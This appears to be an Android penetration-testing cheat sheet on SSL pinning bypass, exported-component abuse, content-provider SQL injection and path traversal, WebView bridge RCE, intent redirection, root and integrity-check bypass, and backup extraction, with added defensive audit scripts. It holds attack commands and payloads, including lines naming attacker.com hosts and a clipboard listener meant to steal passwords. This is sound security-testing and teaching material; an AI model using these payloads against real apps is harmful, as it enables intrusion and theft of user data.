SKILL.md
## 1. SSL PINNING BYPASS

### 1.1 Frida Universal Bypass

```bash
# Install Frida server on device
adb push frida-server-16.x.x-android-arm64 /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server-16.x.x-android-arm64"
adb shell "/data/local/tmp/frida-server-16.x.x-android-arm64 &"

# Universal SSL pinning bypass
frida -U -l ssl_pinning_bypass.js -f com.target.app --no-pause
```
| Hook Point | Library/Class | Coverage |
|---|---|---|
| `X509TrustManager.checkServerTrusted` | Android SDK | All standard HTTPS |
| `OkHttpClient.Builder.sslSocketFactory` | OkHttp 3.x/4.x | Square OkHttp |
| `CertificatePinner.check` | OkHttp 3.x/4.x | OkHttp pinning |
| `HttpsURLConnection.setSSLSocketFactory` | Android SDK | Legacy HTTPS |
| `SSLContext.init` | Android SDK | Custom SSL contexts |
| `WebViewClient.onReceivedSslError` | WebView | WebView SSL errors |
| `TrustManagerFactory.getTrustManagers` | Android SDK | Factory-created TMs |
### 1.2 Objection (Quick Method)

```bash
objection -g com.target.app explore
# Inside Objection REPL:
android sslpinning disable
```
### 1.3 Network Security Config (Debug Builds)

If you can modify the APK or it is a debug build (`<debug-overrides>` is honoured by the platform only when `android:debuggable="true"`):

```xml
<!-- res/xml/network_security_config.xml -->
<network-security-config>
    <debug-overrides>
        <trust-anchors>
            <certificates src="user" /> <!-- Trust user-installed CAs -->
        </trust-anchors>
    </debug-overrides>
</network-security-config>
```
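The defender-side counterpart of this section is checking that a release build's config does not do the same thing outside `<debug-overrides>`. The following audit script is an added example, not part of this cheat sheet; both XML documents are constructed samples, and the pin values are placeholders rather than real SPKI hashes. It flags user-CA trust and cleartext in `base-config`/`domain-config`, a missing `pin-set`, and a pin-set without a backup pin.

```python
"""Audit an Android network_security_config.xml for weak trust settings (added example)."""
import xml.etree.ElementTree as ET

# Constructed sample: trusts user-installed CAs for every connection and allows cleartext
WEAK_CONFIG = """<network-security-config>
  <base-config cleartextTrafficPermitted="true">
    <trust-anchors>
      <certificates src="system" />
      <certificates src="user" />
    </trust-anchors>
  </base-config>
</network-security-config>"""

# Constructed sample: user CAs only under <debug-overrides> (ignored unless the app is
# debuggable), pinning with a backup pin, no cleartext. Pin values are placeholders.
HARDENED_CONFIG = """<network-security-config>
  <base-config cleartextTrafficPermitted="false">
    <trust-anchors>
      <certificates src="system" />
    </trust-anchors>
  </base-config>
  <domain-config>
    <domain includeSubdomains="true">api.example.com</domain>
    <pin-set expiration="2027-01-01">
      <pin digest="SHA-256">PLACEHOLDER_PRIMARY_PIN_BASE64=</pin>
      <pin digest="SHA-256">PLACEHOLDER_BACKUP_PIN_BASE64=</pin>
    </pin-set>
  </domain-config>
  <debug-overrides>
    <trust-anchors>
      <certificates src="user" />
    </trust-anchors>
  </debug-overrides>
</network-security-config>"""


def audit_network_security_config(xml_text):
    """Return a list of findings; an empty list means no weakness was detected."""
    root = ET.fromstring(xml_text)
    findings = []
    # Only base-config and domain-config apply to release builds; the platform ignores
    # debug-overrides unless android:debuggable="true", so it is not audited here.
    for cfg in root.iter():
        if cfg.tag not in ("base-config", "domain-config"):
            continue
        # Only an explicit "true" is flagged: when the attribute is absent the platform
        # default depends on targetSdkVersion (true below API 28, false from 28 on).
        if cfg.get("cleartextTrafficPermitted", "").lower() == "true":
            findings.append(f"{cfg.tag}: cleartext traffic permitted")
        anchors = cfg.find("trust-anchors")
        certs = anchors.findall("certificates") if anchors is not None else []
        for cert in certs:
            if cert.get("src") == "user":
                findings.append(f"{cfg.tag}: user-installed CAs trusted outside debug-overrides")
    pin_sets = list(root.iter("pin-set"))
    if not pin_sets:
        findings.append("no pin-set: certificate pinning not configured")
    for pin_set in pin_sets:
        if len(pin_set.findall("pin")) < 2:
            findings.append("pin-set has fewer than 2 pins (no backup pin for rotation)")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_network_security_config(cfg) or ["no findings"])
```

Run it against the decoded `res/xml/network_security_config.xml` from an APK; a config that trusts `src="user"` in `base-config` means the app accepts any user-installed CA on a release build, so no bypass technique from this section is even needed.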
### 1.4 Magisk Module Approach

| Module | Method | Scope |
|---|---|---|
| LSPosed + TrustMeAlready | Hooks system-wide TrustManager | All apps |
| LSPosed + SSLUnpinning | Targeted SSL bypass | Per-app |
| MagiskTrustUserCerts | Moves user CA to system store | All apps trusting system CAs |
| ConscryptTrustUserCerts | Patches Conscrypt | Newer Android (7+) |
## 2. COMPONENT EXPOSURE

### 2.1 Exported Activities

```bash
# Find exported activities (AndroidManifest.xml or aapt)
aapt dump xmltree target.apk AndroidManifest.xml | grep -B 5 "exported.*true"

# Launch exported activity directly
adb shell am start -n com.target.app/.AdminActivity
adb shell am start -n com.target.app/.DeepLinkActivity \
    -d "target://callback?token=attacker_token"

# With extra data
adb shell am start -n com.target.app/.TransferActivity \
    --es "amount" "99999" --es "recipient" "attacker"
```
### 2.2 Content Providers

```bash
# Query exposed content providers
adb shell content query --uri content://com.target.app.provider/users

# SQL injection in content provider
adb shell content query --uri "content://com.target.app.provider/users" \
    --where "1=1) UNION SELECT sql,2,3 FROM sqlite_master--"

# Path traversal in file-providing content provider
adb shell content read --uri "content://com.target.app.fileprovider/../../../../etc/hosts"
```

| Provider Type | Attack Vector | Impact |
|---|---|---|
| Database-backed | SQL injection via `query()` projection/selection | Data leak, auth bypass |
| File-backed | Path traversal via URI | Read arbitrary files |
| Parcelable | Type confusion in custom Parcelable | Code execution |
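Why the `--where "1=1) UNION ..."` selection above works, and what the fix looks like, is easiest to see side by side. The block below is an added example, not code from this cheat sheet: it models in Python with `sqlite3` what a database-backed provider's `query()` does with the caller-supplied projection and selection. The table, rows and column names are constructed. The strict variant is the Python equivalent of `SQLiteQueryBuilder.setStrict(true)` with a projection map: columns are allowlisted, the selection must have the shape `<column> = ?`, and values travel in `selectionArgs`.

```python
"""Provider query() built by string concatenation vs. a strict, parameterised one (added example)."""
import re
import sqlite3


def open_sample_db():
    """In-memory database standing in for the provider's backing store (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT);"
        "INSERT INTO users VALUES (1, 'alice', 'tok_alice'), (2, 'bob', 'tok_bob');"
    )
    return conn


def vulnerable_query(conn, projection, selection):
    """Mirrors a provider that splices projection and selection straight into SQL.

    The parenthesised WHERE clause matches what SQLiteQueryBuilder emits, which is why a
    selection that closes the parenthesis can append its own SELECT.
    """
    sql = "SELECT %s FROM users WHERE (%s)" % (", ".join(projection), selection)
    return conn.execute(sql).fetchall()


# Columns the provider is willing to expose ('secret' is deliberately absent)
ALLOWED_COLUMNS = {"id", "name"}
# Only selections of the form "<column> = ?" are accepted; the value is bound separately
SIMPLE_SELECTION = re.compile(r"^\s*(\w+)\s*=\s*\?\s*$")


def strict_query(conn, projection, selection, selection_args):
    """Allowlisted projection, constrained selection shape, bound arguments."""
    bad_columns = [c for c in projection if c not in ALLOWED_COLUMNS]
    if bad_columns:
        raise ValueError("projection contains disallowed columns: %s" % bad_columns)
    match = SIMPLE_SELECTION.match(selection)
    if match is None or match.group(1) not in ALLOWED_COLUMNS:
        raise ValueError("selection must be '<allowed column> = ?'")
    if len(selection_args) != 1:
        raise ValueError("exactly one selection argument expected")
    sql = "SELECT %s FROM users WHERE (%s)" % (", ".join(projection), selection)
    return conn.execute(sql, tuple(selection_args)).fetchall()


def demo():
    """Run both variants against the same injected selection (constructed payload).

    Returns (rows leaked by the vulnerable query, whether strict_query rejected the
    payload, rows returned by a legitimate strict query).
    """
    conn = open_sample_db()
    injected = "1=1) UNION SELECT secret FROM users --"
    leaked = vulnerable_query(conn, ["name"], injected)
    try:
        strict_query(conn, ["name"], injected, [])
        rejected = False
    except ValueError:
        rejected = True
    legit = strict_query(conn, ["name"], "id = ?", [1])
    return leaked, rejected, legit


if __name__ == "__main__":
    print(demo())
```

The takeaway for code review: a provider that forwards `selection` into `SQLiteDatabase.query()` without `setStrict(true)`, a projection map, or its own shape check is the database-backed row of the table above.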
### 2.3 Broadcast Receivers

```bash
# Send crafted broadcast
adb shell am broadcast -a com.target.app.ACTION_UPDATE \
    --es "url" "http://attacker.com/malicious.apk"

# Ordered broadcast interception (higher priority receiver intercepts first)
# Register receiver with higher priority than target to intercept/modify data
```
### 2.4 Exported Services

```bash
# Start/bind to exported service
adb shell am startservice -n com.target.app/.BackgroundService \
    --es "command" "exfiltrate"

# List running services
adb shell dumpsys activity services | grep com.target
```
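The `grep -B 5 "exported.*true"` one-liner in §2.1 misses the most common case: a component with an `<intent-filter>` but no `android:exported` attribute at all, which is implicitly exported for apps targeting API 30 and below. The script below is an added example, not part of this cheat sheet; it reads a decoded `AndroidManifest.xml` (the form apktool writes, not the binary XML from `aapt dump xmltree`) and lists every exported activity, service, receiver and provider, how it became exported, and whether an `android:permission` guards it. The manifest is a constructed sample for the hypothetical package `com.example.app`.

```python
"""List exported components from a decoded AndroidManifest.xml (added example)."""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"  # ElementTree attribute prefix
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application android:allowBackup="true">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN" />
        <category android:name="android.intent.category.LAUNCHER" />
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.BROWSABLE" />
        <data android:scheme="example" />
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="true"
        android:permission="com.example.app.permission.ADMIN" />
    <provider android:name=".UserProvider"
        android:authorities="com.example.app.provider"
        android:exported="true" />
    <service android:name=".SyncService" android:exported="false" />
  </application>
</manifest>"""


def _is_launcher(component):
    return any(
        cat.get(ANDROID_NS + "name") == "android.intent.category.LAUNCHER"
        for cat in component.iter("category")
    )


def exported_components(manifest_xml):
    """Return one dict per exported component.

    'how' is 'explicit' for android:exported="true" and 'implicit' when the attribute
    is absent but an <intent-filter> is present (the default up to API 30; from API 31
    such a manifest is rejected at install time). Note: for targetSdkVersion < 17 a
    <provider> defaults to exported even without a filter; that case is not modelled.
    """
    root = ET.fromstring(manifest_xml)
    application = root.find("application")
    found = []
    for comp in application:
        if comp.tag not in COMPONENT_TAGS:
            continue
        exported_attr = comp.get(ANDROID_NS + "exported")
        has_filter = comp.find("intent-filter") is not None
        if exported_attr == "true":
            how = "explicit"
        elif exported_attr is None and has_filter:
            how = "implicit"
        else:
            continue  # exported="false", or neither attribute nor filter
        found.append({
            "tag": comp.tag,
            "name": comp.get(ANDROID_NS + "name"),
            "how": how,
            "permission": comp.get(ANDROID_NS + "permission"),
            "launcher": _is_launcher(comp),
        })
    return found


def unprotected_exports(manifest_xml):
    """Names of exported, non-launcher components with no android:permission guard.

    These are the components to review first for the issues in this section.
    """
    return [
        c["name"] for c in exported_components(manifest_xml)
        if c["permission"] is None and not c["launcher"]
    ]


if __name__ == "__main__":
    for c in exported_components(SAMPLE_MANIFEST):
        print(c)
    print("unprotected:", unprotected_exports(SAMPLE_MANIFEST))
```

On the sample, `.DeepLinkActivity` is reported even though it never says `exported="true"`, and `.AdminActivity` is exported but guarded by a signature-level permission, which is the pattern to look for when an exported component is legitimately needed.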
## 3. WEBVIEW VULNERABILITIES

### 3.1 JavaScript Interface RCE (Pre-API 17)

```java
// Vulnerable when targetSdkVersion < 17: every public method of the bridge object
// is reachable from JavaScript via reflection (the @JavascriptInterface annotation
// is only enforced from API 17 onward)
webView.addJavascriptInterface(new JSInterface(), "android");

// Pre-API 17: reflection-based RCE via injected JavaScript
// Inject into WebView:
// android.getClass().forName('java.lang.Runtime')
//        .getMethod('getRuntime').invoke(null).exec('id')
```
### 3.2 Modern WebView Attacks

| Vulnerability | Condition | Exploit |
|---|---|---|
| `setJavaScriptEnabled(true)` + untrusted content | JS enabled + attacker controls loaded URL | XSS → bridge access |
| `setAllowFileAccessFromFileURLs(true)` | `file://` can read other `file://` | Load `file:///data/data/com.target/...` |
| `setAllowUniversalAccessFromFileURLs(true)` | `file://` can access any origin | Exfiltrate via XHR to attacker |
| `loadUrl(user_controlled)` | User input in `loadUrl` | `javascript:` scheme or `file://` |
| `shouldOverrideUrlLoading` bypass | Incomplete URL validation | Redirect to attacker-controlled page |
| `evaluateJavascript` with tainted data | User data in JS execution | XSS in WebView context |
### 3.3 Deep Link to WebView Chain

1. Attacker crafts deep link: `target://webview?url=https://attacker.com/xss.html`
2. App opens WebView with attacker URL
3. XSS in WebView calls JavaScript bridge: `android.sensitiveMethod()`
4. Bridge executes in app context with app's permissions
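Both the `shouldOverrideUrlLoading` bypass row in §3.2 and step 1 of this chain come down to how the app decides whether a URL may be loaded. The block below is an added example, not code from this cheat sheet: `naive_is_allowed` is the substring check that gets bypassed, `strict_is_allowed` is the form to use instead (parse first, then require `https`, no userinfo, and an exact or subdomain match against an allowlist). The host `trusted.example.com` and the probe URLs are constructed.

```python
"""URL allowlist check for shouldOverrideUrlLoading / deep-link-to-WebView handlers (added example)."""
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"trusted.example.com"}  # constructed allowlist


def naive_is_allowed(url):
    """Substring check: the 'incomplete URL validation' pattern."""
    return "trusted.example.com" in url


def strict_is_allowed(url):
    """Parse, then require https, no userinfo, and an allowlisted host (or subdomain)."""
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if parts.scheme.lower() != "https":
        return False  # rejects javascript:, file:, http:, intent:, content: ...
    if parts.username is not None or parts.password is not None:
        return False  # "https://trusted.example.com@other.example/" has host other.example
    host = (parts.hostname or "").lower().rstrip(".")  # hostname drops port and userinfo
    if not host:
        return False
    return host in ALLOWED_HOSTS or any(host.endswith("." + h) for h in ALLOWED_HOSTS)


# Constructed probe URLs with the verdict a correct check must give
CASES = [
    ("https://trusted.example.com/help", True),
    ("https://api.trusted.example.com/v1", True),
    ("https://trusted.example.com.attacker.example/", False),   # allowlisted host as a prefix
    ("https://attacker.example/?ref=trusted.example.com", False),  # allowlisted host in the query
    ("https://trusted.example.com@attacker.example/", False),   # allowlisted host as userinfo
    ("http://trusted.example.com/", False),                     # downgrade to cleartext
    ("javascript:void(0)//trusted.example.com", False),         # script scheme
    ("file:///data/data/com.example.app/trusted.example.com", False),  # local file scheme
]


def compare_checks():
    """Return (naive_wrong, strict_wrong): the probe URLs each check misjudges."""
    naive_wrong = [u for u, want in CASES if naive_is_allowed(u) != want]
    strict_wrong = [u for u, want in CASES if strict_is_allowed(u) != want]
    return naive_wrong, strict_wrong


if __name__ == "__main__":
    naive_wrong, strict_wrong = compare_checks()
    print("naive check misjudges:", naive_wrong)
    print("strict check misjudges:", strict_wrong)
```

In the Android handler the same logic applies to `Uri.parse(url)` with `getScheme()`, `getUserInfo()` and `getHost()`; the important part is deciding on the parsed host, never on the raw string.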
## 4. INTENT REDIRECTION

Exported activity receives an Intent and starts another (internal) activity using data from the received Intent.

```java
// Vulnerable pattern:
Intent received = getIntent();
Intent redirect = (Intent) received.getParcelableExtra("next_intent");
startActivity(redirect);
// Attacker controls "next_intent" → can start any internal activity
```

```bash
# Exploit: start non-exported internal activity via redirection
adb shell am start -n com.target.app/.ExportedActivity \
    --es "next_intent" "intent:#Intent;component=com.target.app/.InternalAdminActivity;end"
```

| Pattern | Indicator | Risk |
|---|---|---|
| `getParcelableExtra` → `startActivity` | Intent-in-Intent | Start non-exported activities |
| `getStringExtra("url")` → `startActivity(Intent.ACTION_VIEW)` | URL forwarding | Open arbitrary URLs |
| `getStringExtra("class")` → `Class.forName` → `startActivity` | Dynamic class loading | Start any activity by name |
## 5. ROOT DETECTION BYPASS

### 5.1 Common Root Detection Checks

| Check | What It Detects | Frida Bypass |
|---|---|---|
| `su` binary exists | `/system/xbin/su`, `/sbin/su` | Hook `File.exists()` → return false |
| Build tags contain "test-keys" | `Build.TAGS` | Hook `Build.TAGS` → return "release-keys" |
| Magisk Manager installed | Package name check | Hook `PackageManager.getPackageInfo` |
| Superuser.apk present | Su management app | Hook `File.exists()` |
| RootBeer library | Multi-check root detection | Hook all RootBeer check methods |
| SafetyNet/Play Integrity | Server-side attestation | Requires Magisk DenyList + module |
| Abnormal system properties | `ro.debuggable=1`, etc. | Hook `SystemProperties.get` |
### 5.2 Magisk DenyList (Previously MagiskHide)

```text
# Enable DenyList in Magisk Manager
# Add target app to DenyList — Magisk hides itself from that app
# Covers: su binary, Magisk Manager package, mount points, props
```
## 6. PLAY INTEGRITY / SAFETYNET BYPASS

| Level | What It Checks | Bypass Difficulty |
|---|---|---|
| Basic Integrity | Not rooted, not emulator | Easy (Magisk + DenyList) |
| Device Integrity | Bootloader locked, verified boot | Hard (requires locked bootloader) |
| Strong Integrity | Hardware-backed attestation | Very hard (hardware TEE) |

Techniques:

- Magisk with Zygisk enabled + DenyList for target app
- Play Integrity Fix (PIF) Magisk module: spoofs device fingerprint
- Shamiko module: hides root from specific apps
- Custom ROM with locked bootloader (Pixel-specific tricks)
## 7. TAPJACKING (OVERLAY ATTACKS)

```xml
<!-- Malicious overlay activity -->
<activity android:name=".OverlayActivity"
    android:theme="@style/TransparentTheme"
    android:excludeFromRecents="true">
</activity>
<!-- Requires SYSTEM_ALERT_WINDOW permission (draw over other apps) -->
```

| Android Version | Protection | Bypass |
|---|---|---|
| Pre-6.0 | None | Full overlay |
| 6.0–11 | `filterTouchesWhenObscured` (opt-in) | Apps not using it are vulnerable |
| 12+ | Untrusted touches blocked for overlay windows | Partial overlays, timing-based |
## 8. BACKUP EXTRACTION

```bash
# Check if backup allowed
aapt dump xmltree target.apk AndroidManifest.xml | grep allowBackup
# android:allowBackup(0x01010280)=(type 0x12)0xffffffff → true (default!)

# Extract backup
adb backup -f backup.ab -apk com.target.app

# Convert to tar (skip the 24-byte header, then inflate; needs an OpenSSL build with zlib support)
dd if=backup.ab bs=24 skip=1 | openssl zlib -d > backup.tar
tar xf backup.tar

# Analyze extracted data
find com.target.app -name "*.db" -o -name "*.xml" -o -name "*.json"
# Check shared_prefs/ for tokens, credentials
# Check databases/ for SQLite DBs with sensitive data
```
## 9. ADDITIONAL TRICKS

### 9.1 Debuggable App Exploitation

```bash
# If android:debuggable="true" in manifest
adb shell run-as com.target.app
# Now running as the app's user — full data directory access
cat /data/data/com.target.app/shared_prefs/*.xml
```

### 9.2 Drozer (Component Testing Framework)

```text
# List attack surface
dz> run app.package.attacksurface com.target.app
# Exported Activities: 3
# Exported Services: 1
# Exported Providers: 2

# Query provider
dz> run app.provider.query content://com.target.app.provider/users

# Scan for injection
dz> run scanner.provider.injection -a com.target.app
```

### 9.3 Clipboard Sniffing

```java
import android.content.ClipData;
import android.content.ClipboardManager;

// Inside an Activity (Context). Pre-Android 10: any app can read the clipboard
ClipboardManager cm = (ClipboardManager) getSystemService(CLIPBOARD_SERVICE);
cm.addPrimaryClipChangedListener(() -> {
    ClipData data = cm.getPrimaryClip();
    // Exfiltrate copied passwords, tokens, etc.
});
```
## 10. ANDROID PENTESTING DECISION TREE

```text
Testing Android application
│
├── Can intercept HTTPS traffic?
│   ├── No → SSL pinning in place
│   │   ├── Frida available? → universal SSL bypass script (§1.1)
│   │   ├── Rooted + Magisk? → LSPosed + TrustMeAlready (§1.4)
│   │   ├── Debug build? → Network Security Config (§1.3)
│   │   └── None above? → manual decompile + patch + repackage
│   └── Yes → proceed to traffic analysis
│
├── Exported components found?
│   ├── Exported Activities → test direct launch, deeplink abuse (§2.1)
│   ├── Content Providers → SQLi, path traversal (§2.2)
│   ├── Broadcast Receivers → crafted intent injection (§2.3)
│   └── Services → unauthorized service binding (§2.4)
│
├── WebView present?
│   ├── JavaScript enabled + JS interface? → bridge exploitation (§3.1)
│   ├── File access enabled? → file:// scheme abuse (§3.2)
│   └── Deep link → WebView? → URL injection chain (§3.3)
│
├── Intent handling found?
│   └── Intent-in-Intent pattern? → redirect to internal activity (§4)
│
├── Root detection blocking testing?
│   ├── Client-side checks only? → Frida hook bypass (§5.1)
│   ├── SafetyNet/Play Integrity? → Magisk DenyList + modules (§6)
│   └── Custom obfuscated checks? → reverse engineer + targeted hooks
│
├── Sensitive data storage?
│   ├── allowBackup=true? → ADB backup extraction (§8)
│   ├── Debuggable? → run-as for direct data access (§9.1)
│   └── SharedPreferences → check for plaintext tokens/credentials
│
└── UI-based attacks applicable?
    └── Overlay possible? → tapjacking (§7)
```